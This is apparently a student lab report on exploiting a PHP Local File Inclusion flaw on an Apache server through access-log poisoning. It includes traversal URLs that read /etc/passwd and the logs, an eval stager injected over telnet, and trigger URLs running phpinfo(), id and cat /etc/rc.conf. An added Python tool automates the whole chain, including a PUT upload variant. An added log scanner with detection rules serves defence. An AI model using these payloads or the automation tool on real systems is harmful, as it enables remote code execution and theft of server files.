8/15/2019 LFI vulnerability
alfonso-velasco
Objective
Demonstrate and exploit a Local File Inclusion (LFI) vulnerability on an Apache server through Apache log injection (log poisoning).
Methods
The first thing to do is verify that the Apache server targeted by the attack is vulnerable. For this we send a directory traversal payload: in the URL of the web application hosted on the server we give the path of /etc/passwd as the value of the file parameter, preceded by enough ../ sequences to reach the root of the filesystem and followed by a %00 null byte, like this:
http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00
The null byte terminates the string that PHP hands to the filesystem, so anything the script appends after our value (an extension, for example) is ignored. This only works on PHP versions before 5.3.4; later versions reject include paths that contain a null byte.
The result of sending this URL is shown below:
Figure 1 Contents of /etc/passwd on the Apache server
The file we reached lists the user accounts of the host that runs the Apache server. It does not contain password hashes: FreeBSD keeps those in /etc/master.passwd, which is readable only by root. The file also lets us identify the operating system the server runs on, in this case FreeBSD.
Once we have verified that the vulnerability exists we proceed to find out where the access log is located, because we are going to use an Apache log injection attack. For this we consult the default layout of each distribution:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Another test we can do is to try to get the error log of the server. For this we send the following request:
192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-error.log%00
Below we can see that we also obtain the error log of the Apache server. On FreeBSD the Apache port writes its logs to /var/log/httpd-error.log and /var/log/httpd-access.log by default, which is why those paths are used here.
Figure 4 Error log contents on the Apache server
Once we have found the logs of the server we proceed to inject PHP code into the access log through a raw socket connection, in this case with telnet. A raw connection is needed because a browser would percent-encode the <, > and space characters of the payload, and the log would then contain harmless text instead of a PHP tag. Once connected to the server we send the request below (the <?php ... ?> tag is reconstructed here from the description of eval and cmd that follows):
GET /<?php eval($_GET['cmd']); ?> HTTP/1.1
Where:
GET is the request method. Apache copies the whole request line, including the path that carries our PHP code, into the access log; it may answer 400 Bad Request because of the spaces in the path, but the raw line is logged all the same, which is all we need. Using GET also means that the response to the later request that includes the log is shown directly in the browser.
eval evaluates a string as PHP code. The string must be valid PHP code and must end with a semicolon. Here eval executes whatever we send in the cmd parameter on the server.
cmd is the name of the GET parameter through which we send the code to be executed.
The process of connecting to the server and injecting the code is shown below.
Figure 5 Connection with the server and code injection
After the code injection we verify that it works by requesting the following URL, which includes the poisoned access log and passes phpinfo(); in cmd:
http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00
Note that from now on the whole access log is parsed as PHP every time it is included, and every request we make is appended to it. A second injected line with a syntax error would make PHP fail on the entire file, so the injected code must stay valid PHP.
The result of this request is shown below (the cmd window is only there to demonstrate that the request was sent from my IP address):
Figure 6 phpinfo() output obtained via the LFI attack
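What the steps above leave behind in the access log, and how a defender finds it. This is an added example written for this edit, not part of the original report: the log lines are constructed to mirror the report's own requests (the client address 192.168.2.1 is assumed; the script path and the FreeBSD log paths are the ones the report uses), and the detection rules are the editor's own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not a real capture) in Apache "common" log format,
# mirroring the requests the report sends: a benign hit, the /etc/passwd
# traversal check, the poisoning request (Apache answers 400 to the spaces in
# the URI but still logs the raw request line) and the trigger that includes
# the poisoned log and runs phpinfo().
SAMPLE_LOG = r'''
192.168.2.1 - - [15/Aug/2019:10:00:01 -0500] "GET /esime/lfi/exercise1.php?file=page1 HTTP/1.1" 200 512
192.168.2.1 - - [15/Aug/2019:10:00:07 -0500] "GET /esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1840
192.168.2.1 - - [15/Aug/2019:10:01:30 -0500] "GET /<?php eval($_GET['cmd']); ?> HTTP/1.1" 400 226
192.168.2.1 - - [15/Aug/2019:10:02:02 -0500] "GET /esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00 HTTP/1.1" 200 65210
'''.strip().splitlines()

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule runs on the percent-decoded URI, so ..%2f, %2e%2e and %00 are
# caught as well as their literal forms.
RULES = [
    ("traversal", re.compile(r"(\.\./|\.\.\\){2,}")),   # two or more ../ (or ..\) in a row
    ("null-byte", re.compile(r"\x00")),                 # %00 truncation of the include path
    ("php-tag", re.compile(r"<\?(php|=)", re.I)),       # a stager being written into the log
    ("log-include", re.compile(r"/var/log/httpd-(access|error)\.log")),  # FreeBSD Apache log paths
]


def parse_line(line):
    """Split one common-format line into its fields; None if it does not parse."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = m.group("request").split(" ")
    # Apache logs the request line verbatim, so a hand-crafted URI containing
    # spaces (the stager) shows up as extra tokens between method and protocol.
    has_proto = len(parts) >= 3 and parts[-1].startswith("HTTP/")
    uri = " ".join(parts[1:-1] if has_proto else parts[1:])
    return {
        "ip": m.group("ip"),
        "method": parts[0],
        "uri": uri,
        "decoded": unquote(unquote(uri)),  # decoded twice: also catches double encoding
        "status": int(m.group("status")),
    }


def classify(line):
    """Names of the rules that fire on one log line (empty list if none)."""
    rec = parse_line(line)
    if rec is None:
        return []
    hits = [name for name, rx in RULES if rx.search(rec["decoded"])]
    if " " in rec["uri"]:
        hits.append("space-in-uri")  # no browser sends a space inside the URI
    return hits


def scan(lines):
    """(ip, status, uri, hits) for every line that trips at least one rule."""
    findings = []
    for line in lines:
        hits = classify(line)
        if hits:
            rec = parse_line(line)
            findings.append((rec["ip"], rec["status"], rec["uri"], hits))
    return findings


if __name__ == "__main__":
    for ip, status, uri, hits in scan(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(hits)}  {uri[:70]}")
```

The php-tag rule is the one worth alerting on: a PHP open tag has no business in a request line, and once it is in the log the file is executable by any later include. The space-in-uri rule catches the same poisoning request even if the tag is obfuscated, since a browser never leaves a raw space in the path.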
Once we are able to send commands through cmd we can obtain the UID of the web server process, the phpinfo() output and the contents of /etc/rc.conf. Below I show the output of id and the rc.conf data.
Figure 7 Contents of rc.conf
Figure 8 Server UID
There are many ways to inject code, but most of them give the same result. One of them is to upload a .txt file through a raw socket with the PUT method; an example is shown below:
telnet 192.168.116.134 80
Trying 192.168.116.134...
PUT /file_name.txt HTTP/1.1
A stock Apache has no handler for PUT and answers 405 Method Not Allowed; the file is only created if PUT has been enabled on the server (for example through a DAV location), so the status line of the response must be checked. Even when the file is not created, the request line PUT /file_name.txt HTTP/1.1 is still written to the access log, but the request body carrying the PHP code is not.
The content of the .txt file is PHP code of the same kind as the stager injected earlier: it lets us obtain the server information through the cmd parameter, as in the process explained before.
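The whole procedure of this report (the traversal check, the log poisoning request, the trigger with cmd) together with the PUT variant above, as a small Python tool. This is an added example, not code from the original report: the target address, script path and FreeBSD log paths are the ones the report uses, the stager string is reconstructed from the report's description of eval and cmd, and send_raw does over a socket what the report did by hand with telnet.

```python
import socket
from urllib.parse import quote

TARGET = "192.168.2.250"                  # from the report
SCRIPT = "/esime/lfi/exercise1.php"       # from the report
ACCESS_LOG = "/var/log/httpd-access.log"  # FreeBSD Apache port default, as in the report
STAGER = "<?php eval($_GET['cmd']); ?>"   # reconstructed from the report's eval/cmd description


def traversal(path, depth=12):
    """Value for the `file` parameter: enough ../ to reach / from any depth,
    the target path, then %00 so that whatever the script appends is cut off
    (only effective on PHP < 5.3.4; newer PHP rejects paths containing NUL)."""
    return "../" * depth + path.lstrip("/") + "%00"


def lfi_url(path, cmd=None):
    """Full URL that includes `path`; with `cmd`, also the code for the stager."""
    url = f"http://{TARGET}{SCRIPT}?file={traversal(path)}"
    if cmd is not None:
        url += "&cmd=" + quote(cmd, safe="")  # PHP decodes it before eval sees it
    return url


def poison_request(stager=STAGER, host=TARGET):
    """Raw request line carrying the stager in the path. It has to go over a
    raw socket: a browser would percent-encode <, > and the spaces, and the
    log would then hold %3C%3Fphp..., which PHP never executes. Apache may
    answer 400 because of the spaces in the URI, but it writes the raw line to
    the access log anyway, which is all the attack needs."""
    return (f"GET /{stager} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Connection: close\r\n\r\n")


def put_request(filename, body, host=TARGET):
    """The PUT variant. A stock Apache answers 405 and creates nothing; only a
    server with PUT enabled (e.g. a DAV location) stores the body, so check
    status_code() on the reply before trying to include the file."""
    data = body.encode()
    return (f"PUT /{filename} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Content-Type: text/plain\r\n"
            f"Content-Length: {len(data)}\r\n"
            "Connection: close\r\n\r\n") + body


def status_code(raw_response):
    """HTTP status code from a raw response, or None if it is not HTTP."""
    first = raw_response.split("\r\n", 1)[0]
    parts = first.split(" ")
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        return None
    return int(parts[1])


def send_raw(request, host=TARGET, port=80, timeout=5):
    """What telnet did by hand: open a TCP connection, write the bytes, read the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print("1. traversal check :", lfi_url("/etc/passwd"))
    print("2. poisoning       :", repr(poison_request().split("\r\n")[0]))
    reply = send_raw(poison_request())
    print("   server answered :", status_code(reply))
    print("3. trigger         :", lfi_url(ACCESS_LOG, cmd="phpinfo();"))
    print("   id / rc.conf    :", lfi_url(ACCESS_LOG, cmd="system('id; cat /etc/rc.conf');"))
    reply = send_raw(put_request("file_name.txt", STAGER + "\n"))
    print("4. PUT answered    :", status_code(reply), "(405 means PUT is not enabled)")
```

The builders are pure functions, so the exact bytes can be inspected before anything is sent, and a 400 on the poisoning request is expected rather than a failure. For the PUT variant the status line is the only reliable signal: 201 or 204 means the file exists, 405 means the server never stored it.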
Conclusions
The development of this exercise wasn't successful because I couldn't obtain a remote shell. Despite this, the knowledge obtained is very valuable, because from this attack many other attacks can be derived and, consequently, prevented, which is an improvement for the security student. Personally I will continue with this exercise and I hope to achieve the full objective and share it with the teacher.